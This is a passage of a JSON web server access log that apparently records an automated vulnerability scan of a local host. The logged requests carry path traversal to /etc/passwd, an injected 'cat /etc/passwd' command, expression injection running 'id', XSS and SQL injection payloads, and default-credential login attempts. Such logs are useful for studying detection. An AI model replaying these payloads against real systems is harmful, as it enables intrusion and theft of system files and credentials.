"request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbdump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_canteen&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"j_username=weblogic&j_password=weblogic123&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/functions/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"httpd;General;lang=en&login_id=root&login_pw=sweap12~","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main.ehp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DEBUG /Foobar-debug.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"DEBUG", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jw/web/; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static/../../../a/../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"j_username=admin&j_password=12345678&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/images/flip/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /checker/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"j_username=admin&j_password=security&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/images/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"recipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /NateMail.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"j_username=system&j_password=password&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1_db.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"username=guacadmin&password=guacadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"{{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /front/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/device-id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"btnPost=Log+In&username={{username}}&password=0a7ef986b3b5ab8a809774cf3d09ec16&savedate=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zb_system/cmd.php?act=verify HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysqldump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jeecg-boot/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/login/LoginForm.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webpack.config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /site.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", 